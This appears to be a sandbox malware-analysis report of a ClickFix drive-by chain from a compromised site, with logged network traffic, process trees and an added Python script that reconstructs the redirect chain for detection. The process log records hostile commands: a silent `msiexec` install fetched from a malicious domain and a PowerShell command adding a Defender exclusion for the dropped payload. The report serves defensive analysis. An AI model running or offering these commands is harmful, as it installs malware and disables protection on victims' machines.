Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | date: Wed, 28 May 2025 21:04:53 GMT | content-type: text/html; charset=utf-8 | server: cloudflare | x-powered-by: Express | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=xC0Q7Hi4noyunanxx%2FEUH%2BThVgxmACj7A%2BzdvsTniW%2B60q2XGhA24GuYl%2FUOVLbIxgOA1OJpZCN95OAAEPSMB1D71CyrygXDjZLDk%2BGEnfFcG8WwEEU%3D"}]} | cf-cache-status: DYNAMIC | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | content-encoding: zstd | cf-ray: 9470b4ff4d8def75-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 22
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | date: Wed, 28 May 2025 21:04:54 GMT | content-type: text/html; charset=utf-8 | server: cloudflare | x-powered-by: Express | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=Jq7YzULR4Pxb4qUCsV9dXOdNv7gRprFj9pDbvsbt5uMyIN%2BVhPRIjF9fLdz5usQkexJ05kvLTMBjdb%2BGHl72mDLaa6xyXl8h2lfXl%2FYD6%2FgsPOqL81s%3D"}]} | cf-cache-status: DYNAMIC | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | content-encoding: zstd | cf-ray: 9470b5023c92ef75-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 22
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | date: Wed, 28 May 2025 21:04:54 GMT | content-type: text/html; charset=utf-8 | server: cloudflare | x-powered-by: Express | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=7pCkIbuubRvwGrJJUW7paT4nM38Gb2kvKEra28Jh7jZ9VpYK%2BZr8VGnuXXrPQcrcR1Z9Tdbw7ykZW8ygDoUl4fNAl6R6gpiV5csWJwmB0kg9MhyY%2FXI%3D"}]} | cf-cache-status: DYNAMIC | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | content-encoding: zstd | cf-ray: 9470b5054b5def75-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 22
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | date: Wed, 28 May 2025 21:04:55 GMT | content-type: text/html; charset=utf-8 | server: cloudflare | x-powered-by: Express | report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=fsMtKzRm9WdDPE6bIuQUOZcNFr%2FsL3pO2FNWo42L4R7YN8tVPnFR26%2F8YC8nyQdNdS%2FaNcQzSMxV4l3mbtvq%2BOQ8mS3Yp8Ai49%2BPKnUNgnQkyWwxy40%3D"}]} | cf-cache-status: DYNAMIC | nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} | content-encoding: zstd | cf-ray: 9470b5088b05ef75-LAX | alt-svc: h3=":443"; ma=86400 | content-length: 22
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html;charset=utf-8 | x-ws-ratelimit-limit: 1000 | x-ws-ratelimit-remaining: 999 | date: Wed, 28 May 2025 21:04:56 GMT | server: Apache | x-powered-by: PHP/8.1.32 | content-encoding: gzip | content-length: 36261
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | content-type: text/html;charset=utf-8 | x-ws-ratelimit-limit: 1000 | x-ws-ratelimit-remaining: 998 | date: Wed, 28 May 2025 21:04:56 GMT | server: Apache | x-powered-by: PHP/8.1.32 | content-encoding: gzip | content-length: 32005
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=71vzwGo%2Fhm%2FpDed9cgryHnFL4kUcpE9%2FU2dfsEHZyIoiO3Nv5l89b
Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=zuflUyn6wpns%2BQxm6uLfjcnmMTjpCzagZEPQ5ZiJ00wYgmh1BDB91s43N
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://analytiscnode.com/
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://analytiscnode.com/A3fB7c10eD2aF5b8/?wsid=cogniai.com&domain=Y29nbmlhaS5jb20=&link=aHR0cHM6Ly
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgP
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940356506.0000020DCBD7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgmV
Source: chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/12180
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/?verified=true
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/?verified=true(
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/?verified=trueFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n
Source: chrome.exe, 00000000.00000002.1956170033.0000016687930000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/?verified=truebmlhaS5jb20=&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9h
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/wp-content/themes/techze/custom.js?ver=1
Source: chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/wp-content/themes/techze/js/pointer.js?ver=1
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/wp-content/themes/techze/js/yukari-cik.js?ver=1
Source: chrome.exe, 00000000.00000002.1956322086.0000016687967000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://cogniai.com/wp-content/uploads/2023/11/thumb_COGNIAI-Concept9-FF-01-1.png
Source: chrome.exe, 00000000.00000002.1956322086.000001668796D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/apps-themes
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/asuacrsguc:50:0
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/asuacrsguc:50:0cross-origin-opener-policy-report-only:sam
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCE1CC000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C613F000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: cmd.exe, 0000001D.00000003.1732104353.0000022607DC8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001D.00000003.1743385571.0000022607DC8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d-nodes.shop/143033599042554?dtix0r5t=v9yU1KMas6TTLJXsHXxM%2B5Le4pejRZ8FoYSix9DoKZlSzGJQn0n1
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F8D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://fonts.gstatic.com
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://fonts.gstatic.com/
Source: chrome.exe, 00000000.00000002.1959321274.0000016688AFC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1949754837.0000016680DB1000.00000002.00000001.00040000.00000008.sdmp String found in binary or memory: https://kolepti.com/flare.msi
Source: chrome.exe, 00000000.00000002.1960138926.0000016688C6A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.1956170033.000001668794D000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://security.flaweguaard.com/?domain=Y29nbmlhaS5jb20%3D&link=aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb25
Source: chrome.exe, 00000000.00000002.1953734526.0000016686F87000.00000004.00000001.00040000.00000008.sdmp String found in binary or memory: https://www.google.com/
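The HTTP, DNS and memory-string entries above record the whole ClickFix chain: the compromised cogniai.com page calls analytiwave.com/api/getUrl, the browser is sent cross-site to security.flaweguaard.com with the referring site and a decoy image URL carried as base64 `domain` and `link` parameters, a `/log-click` beacon fires, the victim is sent back to cogniai.com/?verified=true, and then msiexec (user-agent "Windows Installer") fetches kolepti.com/flare.msi. The script below is an added example for this report, not part of the Joe Sandbox output: it reconstructs that chain from the request lines, decodes the base64 parameters, and lists DNS names not explained by the page's own dependencies. The sample requests and DNS names are constructed from the report's entries (hosts, paths, query strings, cookie and user-agents copied as logged; header sets trimmed to what the checks read); the benign-suffix list and the stage names are assumptions for illustration, not a vetted allowlist or a vendor taxonomy.

```python
"""Rebuild the ClickFix redirect chain and pull candidate IOCs from sandbox network entries."""
import base64
from urllib.parse import parse_qs, urlsplit

CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36")
LINK_B64 = ("aHR0cHM6Ly9jb2duaWFpLmNvbS93cC1jb250ZW50L3VwbG9hZHMvMjAyMy8xMS90aHVt"
            "Yl9DT0dOSUFJLUNvbmNlcHQ5LUZGLTAxLTEucG5n")

# Constructed sample: one dict per report entry, in the order the sandbox logged them.
SAMPLE_REQUESTS = [
    {"url": "https://cogniai.com/wp-content/uploads/2023/09/ss4-1-1.jpg",
     "headers": {"user-agent": CHROME_UA, "sec-fetch-site": "none", "sec-fetch-mode": "cors"}},
    {"url": "https://analytiwave.com/api/getUrl",
     "headers": {"user-agent": CHROME_UA, "sec-fetch-site": "none", "sec-fetch-mode": "cors"}},
    {"url": "https://security.flaweguaard.com/9a8B7c6D5e4F3a2B1c0D9e8F7a6B5c"
            "?wsid=cogniai.com&domain=Y29nbmlhaS5jb20%3D&link=" + LINK_B64,
     "headers": {"user-agent": CHROME_UA, "sec-fetch-site": "cross-site",
                 "sec-fetch-mode": "navigate", "referer": "https://cogniai.com/"}},
    {"url": "https://security.flaweguaard.com/log-click",
     "headers": {"user-agent": CHROME_UA, "sec-fetch-mode": "cors",
                 "cookie": "secret_access=976580a2-df33-40c1-a707-2d3dce728313"}},
    {"url": "https://cogniai.com/?verified=true",
     "headers": {"user-agent": CHROME_UA, "sec-fetch-site": "cross-site", "sec-fetch-mode": "navigate"}},
    {"url": "https://kolepti.com/flare.msi",
     "headers": {"user-agent": "Windows Installer", "accept": "*/*"}},
]

# Constructed sample: the DNS queries listed in the report, in order.
SAMPLE_DNS = ["www.google.com", "cogniai.com", "ka-f.fontawesome.com", "analytiwave.com",
              "analytiscnode.com", "security.flaweguaard.com", "a.nel.cloudflare.com",
              "kolepti.com", "api.ipify.org", "d-nodes.shop", "beacons.gcp.gvt2.com",
              "c.pki.goog", "beacons.gvt2.com"]

# Assumed benign for this page load: the site itself, its font CDN, Google/Cloudflare/Microsoft telemetry.
ASSUMED_BENIGN_SUFFIXES = ("cogniai.com", "google.com", "fontawesome.com", "cloudflare.com",
                           "gvt2.com", "pki.goog", "microsoft.com")


def decode_b64_params(url, names=("domain", "link")):
    """Return the named query parameters base64-decoded (parse_qs undoes the %3D first)."""
    qs = parse_qs(urlsplit(url).query)
    decoded = {}
    for name in names:
        if name in qs:
            raw = qs[name][0]
            raw += "=" * (-len(raw) % 4)  # tolerate padding stripped by the TDS
            decoded[name] = base64.b64decode(raw).decode("utf-8", "replace")
    return decoded


def classify(req):
    """Label one request with the stage of the chain it belongs to, or None for page noise."""
    parts = urlsplit(req["url"])
    h = {k.lower(): v for k, v in req["headers"].items()}
    # msiexec fetching an installer from the web: the behaviour behind the Sigma hit.
    if h.get("user-agent") == "Windows Installer" and parts.path.lower().endswith(".msi"):
        return "msiexec-remote-install"
    # Cross-site top-level navigation that carries the referring site and a decoy link in base64.
    params = decode_b64_params(req["url"])
    if (h.get("sec-fetch-mode") == "navigate" and h.get("sec-fetch-site") == "cross-site"
            and "domain" in params and "link" in params):
        return "tds-landing"
    if parts.path == "/log-click" and "cookie" in h:
        return "captcha-click-beacon"
    if parse_qs(parts.query).get("verified") == ["true"]:
        return "return-to-origin"
    return None


def build_chain(requests):
    """Ordered (host, stage) hops; image, CSS and other unlabeled fetches drop out."""
    hops = []
    for req in requests:
        stage = classify(req)
        if stage:
            hops.append((urlsplit(req["url"]).hostname, stage))
    return hops


def unexplained_domains(queries, benign_suffixes=ASSUMED_BENIGN_SUFFIXES):
    """DNS names not covered by the benign list, in first-seen order (candidate IOCs)."""
    seen, out = set(), []
    for q in queries:
        if q in seen:
            continue
        seen.add(q)
        if not any(q == s or q.endswith("." + s) for s in benign_suffixes):
            out.append(q)
    return out


if __name__ == "__main__":
    for host, stage in build_chain(SAMPLE_REQUESTS):
        print(f"{stage:24} {host}")
    print("decoded:", decode_b64_params(SAMPLE_REQUESTS[2]["url"]))
    print("unexplained DNS:", unexplained_domains(SAMPLE_DNS))
```

The `tds-landing` check keys on the Fetch Metadata headers rather than on the hostname, so it still fires when the same kit is staged on a different domain; the `msiexec-remote-install` check is the network-side counterpart of the "msiexec download and execute" Sigma rule and is worth alerting on regardless of destination, since legitimate installs rarely pull an MSI straight from a bare domain with no referer.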
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.24:49731 version: TLS 1.2

System Summary

Source: 00000000.00000003.1919315659.0000016687610000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5BF4.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE1FD.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe File created: C:\Windows\system32\Hueta.exe Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Code function: 0_3_000001668763F1D3 0_3_000001668763F1D3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Code function: 0_3_00000166876400B7 0_3_00000166876400B7
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Code function: 0_3_000001668763F603 0_3_000001668763F603
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process token adjusted: Security Jump to behavior
Source: gr0D62WdkfOXqpbHbRHp.25.dr Static PE information: Number of sections : 11 > 10
Source: 00000000.00000003.1919315659.0000016687610000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine Classification label: mal100.spre.phis.troj.spyw.evad.win@48/270@43/15
Source: C:\Windows\System32\cmd.exe Mutant created: \Sessions\1\BaseNamedObjects\filemanagers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7000:120:WilError_03
Source: C:\Windows\System32\appidpolicyconverter.exe Mutant created: PolicyMutex
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\ Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File read: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\msiwrapper.ini Jump to behavior
Source: C:\Windows\System32\appidpolicyconverter.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCD75D000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000000.1631642009.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 0xBKHFISYHPX.exe, 00000019.00000002.1940896649.0000020DCD75D000.00000004.00000020.00020000.00000000.sdmp, Hueta.exe, 0000001C.00000000.1631642009.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp, Hueta.exe, 0000001C.00000002.1637297681.00007FF7C5F92000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "HTTPS://cogniai.com"
Source: unknown Process created: C:\Windows\System32\appidpolicyconverter.exe "C:\Windows\system32\appidpolicyconverter.exe"
Source: C:\Windows\System32\appidpolicyconverter.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K msiexec /i https://kolepti.com/flare.msi /qn
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec /i https://kolepti.com/flare.msi /qn
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF62B73C00C1B0D08C68F4BFD7AE82B4
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\expand.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe "C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath "C:\Windows\system32\Hueta.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\Hueta.exe "C:\Windows\system32\Hueta.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-8ef368c0-5aba-48bb-9157-d040e4f99f2d\files\0xBKHFISYHPX.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1876,i,5440256914354337086,2860174452977065864,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2172 /prefetch:11 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
